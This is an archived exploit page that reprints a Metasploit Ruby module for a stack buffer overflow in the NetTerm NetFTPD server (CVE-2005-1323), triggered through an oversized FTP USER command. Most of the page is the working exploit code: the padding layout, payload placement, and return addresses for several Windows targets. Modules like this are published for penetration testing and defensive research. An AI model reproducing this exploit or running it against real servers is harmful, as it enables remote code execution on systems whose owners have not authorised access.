exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NetTerm NetFTPD USER Buffer Overflow

NetTerm NetFTPD USER Buffer Overflow
Posted Nov 26, 2009
Authored by H D Moore | Site metasploit.com

This Metasploit module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. This Metasploit module uses the USER command to trigger the overflow.

tags | exploit, overflow
advisories | CVE-2005-1323
SHA-256 | 157efd2b2a6bbcdc282420d4127d491626ef280ec52ce572eb9663a2689c7dd5

NetTerm NetFTPD USER Buffer Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Ftp

def initialize(info = {})
super(update_info(info,
'Name' => 'NetTerm NetFTPD USER Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the NetTerm NetFTPD
application. This package is part of the NetTerm package.
This module uses the USER command to trigger the overflow.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-1323'],
[ 'OSVDB', '15865'],
[ 'URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],
[ 'BID', '13396'],

],
'Privileged' => false,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x20\x0d",
'StackAdjustment' => -3500,

},

'Targets' =>
[
[
'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005
{
'Platform' => 'win',
'Ret' => 0x0040df98, # netftpd.exe (multiple versions)
},
],
[
'Windows 2000 English',
{
'Platform' => 'win',
'Ret' => 0x75022ac4, # ws2help.dll
},
],
[
'Windows XP English SP0/SP1',
{
'Platform' => 'win',
'Ret' => 0x71aa32ad, # ws2help.dll
},
],
[
'Windows 2003 English',
{
'Platform' => 'win',
'Ret' => 0x7ffc0638, # peb magic :-)
},
],
[
'Windows NT 4.0 SP4/SP5/SP6',
{
'Platform' => 'win',
'Ret' => 0x77681799, # ws2help.dll
},
],
],
'DisclosureDate' => 'Apr 26 2005',
'DefaultTarget' => 0))
end

def check
connect
disconnect
if (banner =~ /NetTerm FTP server/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end

def exploit
connect

print_status("Trying target #{target.name}...")

# U push ebp
# S push ebx
# E inc ebp
# R push edx
# \x20\xC0 and al, al

buf = rand_text_english(8192, payload_badchars)
buf[0, 1] = "\xc0"
buf[1, payload.encoded.length] = payload.encoded
buf[1014, 4] = [ target.ret ].pack('V')

send_cmd( ["USER #{buf}"] )
send_cmd( ['HELP'] )

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close